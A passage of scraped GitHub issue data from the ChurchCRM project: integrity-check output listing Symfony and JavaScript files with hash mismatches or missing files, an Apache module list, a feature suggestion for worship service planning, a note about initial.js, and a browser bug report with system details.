Mismatch","expectedhash":"ff552bd0c3c38c0a6603f3b3c3092fc0d9fc859b","actualhash":"ca286694d9d3cef6f7bdac036a254a4949365c46"},{"filename":"vendor\/symfony\/console\/Tests\/Helper\/SymfonyQuestionHelperTest.php","status":"Hash Mismatch","expectedhash":"568642f28fb9d0524bb3a7e379ed3fc561245164","actualhash":"de2df725e6ee447aecf0a3e73bac19f2c8f0d35a"},{"filename":"vendor\/symfony\/console\/Tests\/Helper\/TableTest.php","status":"Hash Mismatch","expectedhash":"1617153ab69b3f777866fb8f8ffb2c7bfa1e044c","actualhash":"62fe707f9c6eb119bbe86dc24813e8b533f28642"},{"filename":"vendor\/symfony\/console\/Tests\/Logger\/ConsoleLoggerTest.php","status":"Hash Mismatch","expectedhash":"1f3ec6449785a66fc78607161b92ef53ac3eb50c","actualhash":"160e21642456ac69abe4ef8d2f12215cc820a046"},{"filename":"vendor\/symfony\/console\/Tests\/Output\/StreamOutputTest.php","status":"Hash Mismatch","expectedhash":"9d1082d5557fdacdca47a4943fef6737653d97e1","actualhash":"2ae523770f8ddf02dcf5fb7abf077063a6864ad9"},{"filename":"vendor\/symfony\/console\/Tests\/Tester\/ApplicationTesterTest.php","status":"Hash Mismatch","expectedhash":"a474e591653705b653897e6f390a185da0323fc7","actualhash":"c0e2ce68081300cda789cc77a9039ec0befd0368"},{"filename":"vendor\/symfony\/console\/Tests\/Tester\/CommandTesterTest.php","status":"Hash Mismatch","expectedhash":"6582b39c6f97cd0cdba0f320e536ad0dbaccb682","actualhash":"47b2f540956baf1c1b69cfad925419d632e07fea"},{"filename":"vendor\/symfony\/debug\/BufferingLogger.php","status":"Hash Mismatch","expectedhash":"00c4f19c28f50517407d732a50befd6fab44acab","actualhash":"3a012198a3fa68282d7b9c069a7c2c88bebd2a6c"},{"filename":"vendor\/symfony\/debug\/Debug.php","status":"Hash Mismatch","expectedhash":"9e220d08946b85b59bbdaaf4f5db264537248abf","actualhash":"5fb5c68468614d8d0f642ba4afd0d244c7ac7a9e"},{"filename":"vendor\/symfony\/debug\/DebugClassLoader.php","status":"Hash Mismatch","expectedhash":"b69a2a82d0f4a1be950b83f11368da60f6ed8562","actualhash":"6d551d490da4263c8960df1fd898b2c74dbbb077"},{"filename":"vendor\/symfony\/debug\/ErrorHandler.php","status":"Hash Mismatch","expectedhash":"b41fe7f56d5dd403893ff793d86d829fc5ac61ab","actualhash":"0cd4733d7c39e1af042cac1184914a87d3182c77"},{"filename":"vendor\/symfony\/debug\/Exception\/ClassNotFoundException.php","status":"Hash Mismatch","expectedhash":"f790636144b6f353f26088a114320bf257afce0e","actualhash":"d4c4d5a7c88b370148b766ff73c7074530f6a5b4"},{"filename":"vendor\/symfony\/debug\/Exception\/FatalErrorException.php","status":"Hash Mismatch","expectedhash":"da6f852bbe87b3c47e204b8cb2ebf8273e59499d","actualhash":"e0eb785d6b3cab8cddef2ffe3e6cc6c2dc70d813"},{"filename":"vendor\/symfony\/debug\/Exception\/FatalThrowableError.php","status":"Hash Mismatch","expectedhash":"df83361a01931cfc182415e6a052f13fc236ff9f","actualhash":"cd25269da21ff80106d4aaf4446f7e3536f5d55f"},{"filename":"vendor\/symfony\/debug\/Exception\/FlattenException.php","status":"Hash Mismatch","expectedhash":"48710b5bc799dc95a4502fb236ff8403021279aa","actualhash":"bfcea6ca8ead05c624f45ec3d46ede5da29eaa11"},{"filename":"vendor\/symfony\/debug\/Exception\/OutOfMemoryException.php","status":"Hash Mismatch","expectedhash":"37ff3e7caa3466cdfa11501a5f16aec45f3d15ab","actualhash":"36424368e70e97713e89f628ea20fa422a9d4c94"},{"filename":"vendor\/symfony\/debug\/Exception\/SilencedErrorContext.php","status":"Hash Mismatch","expectedhash":"8b365dbb2e3417cefba5610f9ad90ba802a125d0","actualhash":"102d715559a6845f47740a458960b798faa55afc"},{"filename":"vendor\/symfony\/debug\/Exception\/UndefinedFunctionException.php","status":"Hash Mismatch","expectedhash":"399c47d5b9da3f1fe358ec6c3bc50c4837a3ee22","actualhash":"5ade34fd6d05a1645f75000d441275fcfa829b7d"},{"filename":"vendor\/symfony\/debug\/Exception\/UndefinedMethodException.php","status":"Hash Mismatch","expectedhash":"c0f7bbf2127f6248a8ec072e24889535202e9aad","actualhash":"e7df7630afdb002d9bb2cfa72ff7ae8a61345db5"},{"filename":"vendor\/symfony\/debug\/ExceptionHandler.php","status":"Hash Mismatch","expectedhash":"20fc06c4d235dae31f8f86c626012e0dbcf54e77","actualhash":"0add830afaaa03357edfc51fdabcc22616df285a"},{"filename":"vendor\/symfony\/debug\/FatalErrorHandler\/ClassNotFoundFatalErrorHandler.php","status":"Hash Mismatch","expectedhash":"9485135f2cc01f0383ed20861450365dcb873d2f","actualhash":"54f5ae2fac4528fc1f36d482da45c37ddcb89793"},{"filename":"vendor\/symfony\/debug\/FatalErrorHandler\/FatalErrorHandlerInterface.php","status":"Hash Mismatch","expectedhash":"e3edfa378fc6a2276f0ca5b81fc9c67d8c04788c","actualhash":"abc56770f0cdce4335ac59b5961758937a988a9c"},{"filename":"vendor\/symfony\/debug\/FatalErrorHandler\/UndefinedFunctionFatalErrorHandler.php","status":"Hash Mismatch","expectedhash":"9ca1de8ada21dc82fcec49fe3f4274f5076669f7","actualhash":"c5f805d9d519831cf312dc1844645c613727a887"},{"filename":"vendor\/symfony\/debug\/FatalErrorHandler\/UndefinedMethodFatalErrorHandler.php","status":"Hash Mismatch","expectedhash":"2103b9ee46853910f3675b90df9ec26b91b1870b","actualhash":"e17104df9e95b6abfd889c74140b52f2b07ec35c"},{"filename":"vendor\/symfony\/filesystem\/Filesystem.php","status":"Hash Mismatch","expectedhash":"3e06255298245a18f83aa80677ad048984f47972","actualhash":"fc72a64af8d6b8d3dedeaed9c4118d02f0e1e3dd"},{"filename":"vendor\/symfony\/finder\/Finder.php","status":"Hash Mismatch","expectedhash":"83c3b33daa1fbdc50f2d3739b97dbba2fc02e7f5","actualhash":"fab14e77cf8a3661e3449d3a15d70f496b561914"},{"filename":"vendor\/symfony\/finder\/Iterator\/DepthRangeFilterIterator.php","status":"Hash Mismatch","expectedhash":"6597782e70a2101579f19b1436b973b694da3c57","actualhash":"2ca5247de990d1cfb63cbae721bdd8221ddf61bb"},{"filename":"vendor\/symfony\/finder\/SplFileInfo.php","status":"Hash Mismatch","expectedhash":"bd7c5248bf8f4c2b5d36be808c59ecc9e7679f3f","actualhash":"f983cbf8603f024041eee9079962d100ccad609f"},{"filename":"vendor\/symfony\/options-resolver\/OptionsResolver.php","status":"Hash Mismatch","expectedhash":"4d9239d9f3d854fa60fc135e13af77ea99440edc","actualhash":"4ecf1078cd7fc3ded0cdfee20ba7bff36510b65c"},{"filename":"vendor\/symfony\/property-access\/PropertyAccessor.php","status":"Hash Mismatch","expectedhash":"81860a70e241354933e53e7f5d97e3f2cadf6214","actualhash":"8fc9f0a56e68cd26f1bae0a390b4fee0d7607634"},{"filename":"vendor\/symfony\/translation\/Command\/XliffLintCommand.php","status":"Hash Mismatch","expectedhash":"3ffc5c26614207eba7e7855c7aab635bb4be577a","actualhash":"f65f2d2a9fee7a942b67d369bce6561468c1b36b"},{"filename":"vendor\/symfony\/translation\/Dumper\/FileDumper.php","status":"Hash Mismatch","expectedhash":"f5886cc12b3d1e374974e3902236f233b8bb5420","actualhash":"fde264801fe60ec8a023be11c08147ee036c4a1c"},{"filename":"vendor\/symfony\/translation\/Dumper\/JsonFileDumper.php","status":"Hash Mismatch","expectedhash":"dd471a48d0919afdfd21075683cfb59e42d01f7c","actualhash":"5d2e49155e3f7a450825ad5f07423b295d81d1a1"},{"filename":"vendor\/symfony\/translation\/Extractor\/PhpExtractor.php","status":"Hash Mismatch","expectedhash":"5d1d97dd2184cc7365c7eb8202388b61463d1da2","actualhash":"2e64e0e3616965dcb7d6030d81a2962d74cc3a5e"},{"filename":"vendor\/symfony\/translation\/Formatter\/MessageFormatter.php","status":"Hash Mismatch","expectedhash":"228fc6557503c701936f42b6e1b6aef424186879","actualhash":"b6e00339d241cdd0a0a1a83501ac4fba0e6e0457"},{"filename":"vendor\/symfony\/translation\/IdentityTranslator.php","status":"Hash Mismatch","expectedhash":"9868be3898c016f5a2a7d00e83cbb98076aada72","actualhash":"2bfc6a1188acbdd14c647eb0445b873c4e71292d"},{"filename":"vendor\/symfony\/translation\/Interval.php","status":"Hash Mismatch","expectedhash":"1da0a4dd7f5848f1d12a837139ba425c192c33c6","actualhash":"14d01dfe48bdd8377c0bd5900afd749927031e21"},{"filename":"vendor\/symfony\/translation\/Loader\/JsonFileLoader.php","status":"Hash Mismatch","expectedhash":"89a0aea97d0554ad955fae82fa0197154d65da7e","actualhash":"d7c09adc8336c68749b486847117df29aa83c33d"},{"filename":"vendor\/symfony\/translation\/Loader\/PhpFileLoader.php","status":"Hash Mismatch","expectedhash":"e362c4ba9537a027dc890ff7fa9290c92f24f167","actualhash":"ebabcb2b2deb62a0fec857515eaf8a0c2d00d9b6"},{"filename":"vendor\/symfony\/translation\/LoggingTranslator.php","status":"Hash Mismatch","expectedhash":"91bbef17e6d7e6716aff192d8e56a544e2135675","actualhash":"e1eb3590a46fc5a27debe554285a8a53a95b3301"},{"filename":"vendor\/symfony\/translation\/MessageCatalogue.php","status":"Hash Mismatch","expectedhash":"a6208c05a0c5e37c81367b064bceae2fef6bee45","actualhash":"26fba20cc8c0773261625c809e4f9a5de4803e12"},{"filename":"vendor\/symfony\/translation\/MessageSelector.php","status":"Hash Mismatch","expectedhash":"f14c5c7e0833602798209033809c9e22cd710cb4","actualhash":"57785ee40b45f60e7c03b47bf2f1fc9bba65c0b2"},{"filename":"vendor\/symfony\/translation\/PluralizationRules.php","status":"Hash Mismatch","expectedhash":"4954873529256032ebe007f68eb0d14872d27025","actualhash":"6c7f0e84fa5f7ec93dfbf9dacb0e3c9590526735"},{"filename":"vendor\/symfony\/translation\/Resources\/bin\/translation-status.php","status":"Hash Mismatch","expectedhash":"bc6e1f5fe01fb9387c767f02088c0f41718f6427","actualhash":"5adf4250d12370d2883fc03f49fbede57ebe59cb"},{"filename":"vendor\/symfony\/translation\/Translator.php","status":"Hash Mismatch","expectedhash":"212aab15ed7e2ba300a1e26dcfa2fe9412b80a88","actualhash":"962a5758ddff31dd1eabc1ff890b3602bbd0d208"},{"filename":"vendor\/symfony\/translation\/Util\/XliffUtils.php","status":"Hash Mismatch","expectedhash":"2cfc8c679ccd9f9645eb7dc92ed47f50dc2b440f","actualhash":"4fa9f65de3bb9732d2586cc5c6a600e39d377c6d"},{"filename":"vendor\/symfony\/translation\/Writer\/TranslationWriter.php","status":"Hash Mismatch","expectedhash":"021a2e37d1b82ac73286f16e69192d59551079f7","actualhash":"15db0ea14fac7823ef2d74c3f8c5cfded7325751"},{"filename":"vendor\/symfony\/validator\/Constraints\/Bic.php","status":"Hash Mismatch","expectedhash":"39b830f79d88f3406ac1527b67f05652c7e90f69","actualhash":"5b30f05e1fccb060b044672217c84679d82e020d"},{"filename":"vendor\/symfony\/validator\/Constraints\/Country.php","status":"Hash Mismatch","expectedhash":"21cddc1aa7c38fd62b482738bb8a7c31dade3bf7","actualhash":"4b8fde01ed32393284472b60d2ef189cf7e49d22"},{"filename":"vendor\/symfony\/validator\/Constraints\/Currency.php","status":"Hash Mismatch","expectedhash":"7ea1b3b7cef5134b0942d116116e4da767996db2","actualhash":"ddd55790d9304acc558f8b3e29e475e66e97f3c7"},{"filename":"vendor\/symfony\/validator\/Constraints\/DateTimeValidator.php","status":"Hash Mismatch","expectedhash":"2e893741f848f2ee6af015d51a930e921aa76317","actualhash":"975739a96ccf696437423a856a02193fa1a4cfb8"},{"filename":"vendor\/symfony\/validator\/Constraints\/DateValidator.php","status":"Hash Mismatch","expectedhash":"35b4466749b42e0671a641bcaf47184b5a8c1eb0","actualhash":"9a493ff614eb0721c34a5ad637b9d3abe04b5cf6"},{"filename":"vendor\/symfony\/validator\/Constraints\/Email.php","status":"Hash Mismatch","expectedhash":"f089b7b96cdb3fefc57da3d4788a8e12c812ae95","actualhash":"67fa34a842022698cbc9e059e7f93df3dfa95dcd"},{"filename":"vendor\/symfony\/validator\/Constraints\/EmailValidator.php","status":"Hash Mismatch","expectedhash":"9c130ec251e172b3da5a1243217a0c5e88e106a7","actualhash":"ee87945792a64f353114e3d55b4b963320ea05b5"},{"filename":"vendor\/symfony\/validator\/Constraints\/Expression.php","status":"Hash Mismatch","expectedhash":"f2605e34a18e9f236e3436701cbca0126b16cbb2","actualhash":"b34f3007771698b47dd824dff85d5ba4c8b4f4a1"},{"filename":"vendor\/symfony\/validator\/Constraints\/ExpressionValidator.php","status":"Hash Mismatch","expectedhash":"a29331d1ff5d0e87e98bf5603f19f8f1c804dbd0","actualhash":"4a5dbb8212e26f23233db70414879a257ba547af"},{"filename":"vendor\/symfony\/validator\/Constraints\/FileValidator.php","status":"Hash Mismatch","expectedhash":"50c041d67b9e7233f0db2a51839748d24a4e6e6b","actualhash":"097209b09dbfa80adc28ff3cc9160b1b3a343bc9"},{"filename":"vendor\/symfony\/validator\/Constraints\/IpValidator.php","status":"Hash Mismatch","expectedhash":"4126d38829e4a015ebfdb3cb2baaf00e8d214174","actualhash":"1814b50242ae685d9b2a9baa726c954cacaab9f9"},{"filename":"vendor\/symfony\/validator\/Constraints\/JsonValidator.php","status":"Hash Mismatch","expectedhash":"524149d736f6e4d299e38ddc007a200fd8055cec","actualhash":"b6d70fe189ffb401741fd4eee64a00b7898a5031"},{"filename":"vendor\/symfony\/validator\/Constraints\/Language.php","status":"Hash Mismatch","expectedhash":"44f5a0a625b07a9380ea649428b70101d8716156","actualhash":"02c5e511a87d55295957f0cc0b1fcc56e926b458"},{"filename":"vendor\/symfony\/validator\/Constraints\/LengthValidator.php","status":"Hash Mismatch","expectedhash":"a84759501725c714fbe137bc1579e5c4db0fe826","actualhash":"f82e7017451ac29fb0b86ff03b89d9404d48a3c2"},{"filename":"vendor\/symfony\/validator\/Constraints\/Locale.php","status":"Hash Mismatch","expectedhash":"4e01f0675e3e87ab863cf1c031cc9a4df050fc76","actualhash":"f5e1fc1de58749cad26dd95a9f09f195d3d46828"},{"filename":"vendor\/symfony\/validator\/Constraints\/Range.php","status":"Hash Mismatch","expectedhash":"5fdc9246d7427fb68e86e7bf6c4e9db93f222a54","actualhash":"a2d03ffe762759628305554d2197929945593a09"},{"filename":"vendor\/symfony\/validator\/Constraints\/TimeValidator.php","status":"Hash Mismatch","expectedhash":"399bf04eddb85c2f2e1d60abc48af21f36f14d4f","actualhash":"15b42c775907b56c6eb79ca1a968624490679e7e"},{"filename":"vendor\/symfony\/validator\/Constraints\/TimezoneValidator.php","status":"Hash Mismatch","expectedhash":"ed74ef9b394e218a287e7a1059f830749c4dd67b","actualhash":"d5b956573755b7e4ce7c4fe3cdae8daef0483fd3"},{"filename":"vendor\/symfony\/validator\/Constraints\/Url.php","status":"Hash Mismatch","expectedhash":"2a46bb5c75032b1e7545ddf590f959bbeb834f39","actualhash":"67ea936b8fa0ac8bdba50a250d24032cdadd8e6f"},{"filename":"vendor\/symfony\/validator\/Constraints\/UrlValidator.php","status":"Hash Mismatch","expectedhash":"2a338d37fdb518de7d5ed365540e5d947939b7d8","actualhash":"30eb465fbcb64528fd5e2fb4201a712bf0509d72"},{"filename":"vendor\/symfony\/validator\/ConstraintViolation.php","status":"Hash Mismatch","expectedhash":"36aa7b7b1f464938ac4354a697b17d234d28cd9e","actualhash":"8226ed875d48a100a1e4bc07a302b6f34cde2325"},{"filename":"vendor\/symfony\/validator\/Mapping\/Cache\/CacheInterface.php","status":"Hash Mismatch","expectedhash":"90b7aa31d0562bd87e05f6fb1e9bde3cdc0fb740","actualhash":"6ad7383b6be09d225f09ce28983f40ac4e071f1c"},{"filename":"vendor\/symfony\/validator\/Mapping\/Cache\/DoctrineCache.php","status":"Hash Mismatch","expectedhash":"aabb986200c9df54e022415bfece4dddd49c1fb0","actualhash":"8adbcdfa574d58668d19b87810cb1e2ebc373159"},{"filename":"vendor\/symfony\/validator\/Mapping\/Cache\/Psr6Cache.php","status":"Hash Mismatch","expectedhash":"c88dc2fd995b45707490ef27dd4ad17d232e7891","actualhash":"d5b54738f36e1fca4c0ea0757e0d3a99f3a9b725"},{"filename":"vendor\/symfony\/validator\/Mapping\/Factory\/LazyLoadingMetadataFactory.php","status":"Hash Mismatch","expectedhash":"b093d463879f29ed94a69aafc34c9c683a2d1681","actualhash":"0471e52798738e27f958604ae4c0b3577c2f3583"},{"filename":"vendor\/symfony\/validator\/Test\/ConstraintValidatorTestCase.php","status":"Hash Mismatch","expectedhash":"a7f651cd99813b813524b1b60162d05310b9eed2","actualhash":"fd24d1057cbbe41f389fa557eeac82c081d24b3f"},{"filename":"vendor\/symfony\/validator\/Validator\/TraceableValidator.php","status":"Hash Mismatch","expectedhash":"28e0ede729423a192ef13388008c36749ae41855","actualhash":"1bfad5549f6b575ac96d97aa11d889e2ca452871"},{"filename":"vendor\/symfony\/validator\/ValidatorBuilder.php","status":"Hash Mismatch","expectedhash":"9481869004190f105a8972f6976e3989ed76c7ed","actualhash":"eb25ad05d5507fb52f1fc4b933475334a8e3e6c9"},{"filename":"vendor\/symfony\/validator\/Violation\/ConstraintViolationBuilder.php","status":"Hash Mismatch","expectedhash":"251f1db4ea0a826e57fff663b043faaeb436e211","actualhash":"652154d8c726e99face72b934e3afd517c2a3c92"},{"filename":"vendor\/symfony\/yaml\/Command\/LintCommand.php","status":"Hash Mismatch","expectedhash":"672a2b329b83180c9663cf06b77c9028019e2cb8","actualhash":"c88b48989fe7330331b4e6a79de5b229f539269f"},{"filename":"vendor\/symfony\/yaml\/Dumper.php","status":"Hash Mismatch","expectedhash":"6ab2a76790466ee3c370402aa9684edd3d18276d","actualhash":"19c75345a5ac640da029a6beab8f022b65b80387"},{"filename":"vendor\/symfony\/yaml\/Exception\/ParseException.php","status":"Hash Mismatch","expectedhash":"caa6a2b74f39e5b62619a57359d3b8dfe8eb6143","actualhash":"dc651f24fa21975289778c2b1f4451322e027183"},{"filename":"vendor\/symfony\/yaml\/Inline.php","status":"Hash Mismatch","expectedhash":"34e38091774d959683ae2b3321ccdef81a60cfdc","actualhash":"dc3dec0ab192680f83ed59c4096c8dc9c79b039d"},{"filename":"vendor\/symfony\/yaml\/Parser.php","status":"Hash Mismatch","expectedhash":"f69f241c4a53046253e444dd467e8e9007fe7bb3","actualhash":"fa7b5f1a25ba90c2b23573ece04de43efb2129f0"},{"filename":"vendor\/symfony\/yaml\/Tests\/InlineTest.php","status":"Hash Mismatch","expectedhash":"0b07b39033f318c7f429291f5c510c200efba72c","actualhash":"629e9b82bf225c2721b3b1750237953dcf9af16c"},{"filename":"vendor\/symfony\/yaml\/Tests\/ParserTest.php","status":"Hash Mismatch","expectedhash":"2c6ade09a84491c2ede7f486c2ea23832d183905","actualhash":"fd16f90cc626ce216da370931766dd7c73369c27"},{"filename":"vendor\/symfony\/yaml\/Yaml.php","status":"Hash Mismatch","expectedhash":"efda8fc5d0e60f4fb3ef987ea6e1638179261780","actualhash":"3815b2e5cfcdc863293dd9d1d9cb3869218c42e8"},{"filename":"locale\/js\/af_ZA.js","status":"Hash Mismatch","expectedhash":"821b40abe4cf61e9a0f4d8a216f49417c73f39f6","actualhash":"3068a8b4bcf98ef4e1f5de8cec9e7629d845d131"},{"filename":"locale\/js\/ar_EG.js","status":"Hash Mismatch","expectedhash":"986398e455390c0f75061979ad513012f0706f73","actualhash":"e074feeccf4235fad132385e706ede6c81e2a7eb"},{"filename":"locale\/js\/de_DE.js","status":"Hash Mismatch","expectedhash":"e9d3957e46a128b1e61c8fa1b42a96c146becb72","actualhash":"17f6ff23e1b66fa0b9711515a0f9471c1c5728bb"},{"filename":"locale\/js\/en_AU.js","status":"Hash Mismatch","expectedhash":"f89af7b57cb2d69a2b8dc82222eca412d0141be4","actualhash":"ae6e41271a94a43283d60c20d21e9ef72ed5ab51"},{"filename":"locale\/js\/en_CA.js","status":"Hash Mismatch","expectedhash":"598aa74cb2c0c313336ef84e577cbf44dbee65d5","actualhash":"b99d00ccb17651d00aefc42996c66733c5d6e653"},{"filename":"locale\/js\/en_GB.js","status":"Hash Mismatch","expectedhash":"607c34f6a3caccdcb94498bb6f8d362ad0349503","actualhash":"0f12d0e71e4f7b5a8708244dbff9de117540a365"},{"filename":"locale\/js\/es_ES.js","status":"Hash Mismatch","expectedhash":"765faefba7d3ddf70a9ca9c68d21d38d861c6c37","actualhash":"725a8c46653dce54495b6ddf2f14f060ebd873a1"},{"filename":"locale\/js\/et_EE.js","status":"Hash Mismatch","expectedhash":"bc6643ece6ba3a79c894c681d2dd7085cbdf53a6","actualhash":"de15a6755baaf1f830e2f029a6555f4be7b43d80"},{"filename":"locale\/js\/fr_FR.js","status":"Hash Mismatch","expectedhash":"5878cb25455db678838ecda31ddbf1b9cd16c1c4","actualhash":"1e1198c5b147d868b143f4303d7bc5b6c18a8e7b"},{"filename":"locale\/js\/he_IL.js","status":"Hash Mismatch","expectedhash":"1f5eced20734518f312d4b552e7606bc223467d6","actualhash":"4256c85e27cebf96145595b6233799e68add0678"},{"filename":"locale\/js\/hu_HU.js","status":"Hash Mismatch","expectedhash":"969e360c4b55d0334c3e45696d87c6e5b0ed3024","actualhash":"4dd7b94908a58c060b945788529c3e4a43bf3552"},{"filename":"locale\/js\/id_ID.js","status":"Hash Mismatch","expectedhash":"255ded2559cea01ba78497d00106a0055bec985d","actualhash":"b48ce3bcfe6a646d4615307c35a5b16efdb6300e"},{"filename":"locale\/js\/it_IT.js","status":"Hash Mismatch","expectedhash":"73a2987c3b5ff9683a3b4b001b5c08f05ee82d02","actualhash":"e78f67d52acbfe72fab251544866c0e45db2143e"},{"filename":"locale\/js\/nb_NO.js","status":"Hash Mismatch","expectedhash":"898f392bcd48059ca75f2f643cde2f81c0bc9c9d","actualhash":"78060ce4a8cd4ddabfc86d265628beac6948152f"},{"filename":"locale\/js\/nl_NL.js","status":"Hash Mismatch","expectedhash":"102a21ff78ddad4c1c9ae09979537b60eb2baae9","actualhash":"1224ec93bbe29be8d4399481a1bae0abfe552be0"},{"filename":"locale\/js\/pl_PL.js","status":"Hash Mismatch","expectedhash":"95dc81cd4b799e64ec684403dbc01471f9af57a5","actualhash":"b71f2e4e128dd28cb77f3671767e5a23039bf43a"},{"filename":"locale\/js\/pt_BR.js","status":"Hash Mismatch","expectedhash":"ec8f534e80aea9817197ad6782997161a6553a48","actualhash":"1029d5593cd3099900139d6da87ecea4fb04e980"},{"filename":"locale\/js\/pt_PT.js","status":"Hash Mismatch","expectedhash":"35d67b70c534ee537be29cc37ed7bad3337cd5bb","actualhash":"19fff9f0ba6e4733e3cbffe67f7c1280f3eeb420"},{"filename":"locale\/js\/ro_RO.js","status":"Hash Mismatch","expectedhash":"0817fd0dfa639a1b5e371785eaf04d084548424c","actualhash":"237efd6c9b9cec83e9eb24c969d690a87dae9816"},{"filename":"locale\/js\/ru_RU.js","status":"Hash Mismatch","expectedhash":"20e30d6cda238c1298c4a09cd163213b46ca0f12","actualhash":"40bc6c2b3ab51e05acfd149def7c8ccdc5ab4c26"},{"filename":"locale\/js\/sq_AL.js","status":"Hash Mismatch","expectedhash":"1458300605c284c19ce3ff706ed5f240b5eb913c","actualhash":"e7a198424dff2c6d3e3b336ec7e8b12b605d8eda"},{"filename":"locale\/js\/sv_SE.js","status":"Hash Mismatch","expectedhash":"ce5d751fbeced514f75bf42b003985e60412e777","actualhash":"9382bcd044bd8760dfed7da71d8856055529c77f"},{"filename":"locale\/js\/th_TH.js","status":"Hash Mismatch","expectedhash":"b52004a93aed8c0c280d80eec4a20c3149fba475","actualhash":"7f7687805d737394b6bcc5209afdc0658d1c366b"},{"filename":"locale\/js\/vi_VN.js","status":"Hash Mismatch","expectedhash":"1f05264185be76a900d9dfc2ba0a9ab6c1b0b2ed","actualhash":"0574dd54f5cc04f63e71f2a330d32c614fc483bc"},{"filename":"locale\/js\/zh_CN.js","status":"Hash Mismatch","expectedhash":"58dbec836017cddaf1a5bfa244f5dd93a2a14fe4","actualhash":"04359139e883cc1425ce5cabbe3c3b207f6ea835"},{"filename":"locale\/js\/zh_TW.js","status":"Hash Mismatch","expectedhash":"32528057dff697319aff4ee1926db04819351c7f","actualhash":"2b34effbf5f4083e82991bc388db97e2d6c1162b"},{"filename":"skin\/external\/bootbox\/bootbox.min.js","status":"Hash Mismatch","expectedhash":"e655b99d8331bc19f0e1d7969626845980ba3c79","actualhash":"b5563d0de122d9477e5bc69628396d5cb1f427f7"},{"filename":"skin\/external\/fullcalendar\/fullcalendar.js","status":"File Missing"},{"filename":"skin\/external\/fullcalendar\/fullcalendar.min.js","status":"File Missing"},{"filename":"skin\/external\/fullcalendar\/gcal.js","status":"File Missing"},{"filename":"skin\/external\/fullcalendar\/gcal.min.js","status":"File Missing"},{"filename":"skin\/external\/fullcalendar\/locale-all.js","status":"File Missing"},{"filename":"skin\/external\/i18next\/i18next.min.js","status":"Hash Mismatch","expectedhash":"ea742df36cbfe6d09a8ef6d44df6e0adf43aa5e5","actualhash":"e62716ccc17dbc1b43e7046fe0fd4b03e6a882db"},{"filename":"skin\/js\/CRMJSOM.js","status":"Hash Mismatch","expectedhash":"c865f5e479419cb1fa6302499d9c0e8f49cfcf13","actualhash":"c2447d0f2169510cee451e7b25372334cf998308"},{"filename":"skin\/js\/FamilyView.js","status":"Hash Mismatch","expectedhash":"94d503ed1c20ff254ed748bbd40d7148b05c68b1","actualhash":"ee39865ab2b04eceafe17744c38bce3901d66c66"},{"filename":"skin\/js\/locales.js","status":"File Missing"},{"filename":"skin\/js\/PersonView.js","status":"Hash Mismatch","expectedhash":"3b241712e5fdc1c335f1d40e816aa1035ef57f76","actualhash":"094148ba1c1a33acea976e79dca01146e4a3b007"}]}
Apache Modules |core,mod_ssl,prefork,http_core,mod_so,mod_authn_file,mod_authn_dbm,mod_authn_anon,mod_authn_dbd,mod_authn_default,mod_authz_host,mod_authz_groupfile,mod_authz_user,mod_authz_dbm,mod_authz_owner,mod_authz_default,mod_auth_basic,mod_auth_digest,mod_file_cache,mod_cache,mod_disk_cache,mod_mem_cache,mod_dbd,mod_bucketeer,mod_dumpio,mod_case_filter,mod_case_filter_in,mod_reqtimeout,mod_ext_filter,mod_include,mod_filter,mod_substitute,mod_charset_lite,mod_deflate,mod_log_config,mod_logio,mod_env,mod_mime_magic,mod_cern_meta,mod_expires,mod_headers,mod_ident,mod_usertrack,mod_setenvif,mod_version,mod_proxy,mod_proxy_connect,mod_proxy_ftp,mod_proxy_http,mod_proxy_scgi,mod_proxy_ajp,mod_proxy_balancer,mod_mime,mod_dav,mod_status,mod_autoindex,mod_asis,mod_info,mod_cgi,mod_fastcgi,mod_cgid,mod_dav_fs,mod_vhost_alias,mod_negotiation,mod_dir,mod_imagemap,mod_actions,mod_speling,mod_userdir,mod_alias,mod_rewrite,mod_perl,mod_wsgi,mod_xsendfile,mod_php7 | Clicking List Event Types goes back to dashboard | https://api.github.com/repos/ChurchCRM/CRM/issues/5461/comments | 0 | 2020-10-19T01:25:00Z | 2020-10-19T01:25:47Z | https://github.com/ChurchCRM/CRM/issues/5461 | 724,192,506 | 5,461 |
[
"ChurchCRM",
"CRM"
] | Very impressive looking system. My suggestion threads into several areas of your CRM. I have recently pushed my aging project in Git. It was designed to help the Worship Leader plan for Sunday Services and juggle the many team members along with the notification to all the member for songs, resource, practice times and service agenda. It would be a huge effort to build in this functionality, but it may be a rich set of ideas and features you could look at add. Not sure I have the energy any more to do the project development so I offer you these ideas !(https://github.com/D-Jeffrey/WorshipService/blob/main/Docs/GettingStarted.md) with everything else include the DB structure for it.
| New idea - Service planning and scheduling | https://api.github.com/repos/ChurchCRM/CRM/issues/5457/comments | 3 | 2020-10-18T04:15:59Z | 2024-01-08T02:08:21Z | https://github.com/ChurchCRM/CRM/issues/5457 | 723,900,335 | 5,457 |
[
"ChurchCRM",
"CRM"
] | We include initial.js in our software but it looks like we moved to server-side which is slow. we should try a bit of both | Review Usage of initial.js | https://api.github.com/repos/ChurchCRM/CRM/issues/5453/comments | 1 | 2020-10-17T22:06:47Z | 2020-11-25T00:18:56Z | https://github.com/ChurchCRM/CRM/issues/5453 | 723,856,813 | 5,453 |
[
"ChurchCRM",
"CRM"
] | DevTools failed to load SourceMap: Could not load content for https://churchcrm:8890/skin/external/datatables/pdfmake.min.js.map: HTTP error: status code 404, net::ERR_HTTP_RESPONSE_CODE_FAILURE
Collected Value Title | Data
----------------------|----------------
Page Name |/Menu.php
Screen Size |2160x3840
Window Size |1341x1680
Page Size |1341x1680
Platform Information | Darwin dawouds.lan 20.1.0 Darwin Kernel Version 20.1.0: Thu Sep 24 20:22:06 PDT 2020; root:xnu-7195.40.89.100.3~1/RELEASE_X86_64 x86_64
PHP Version | 7.3.9
SQL Version | 5.7.26
ChurchCRM Version |4.2.0
Reporting Browser |Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.80 Safari/537.36
Prerequisite Status |All Prerequisites met
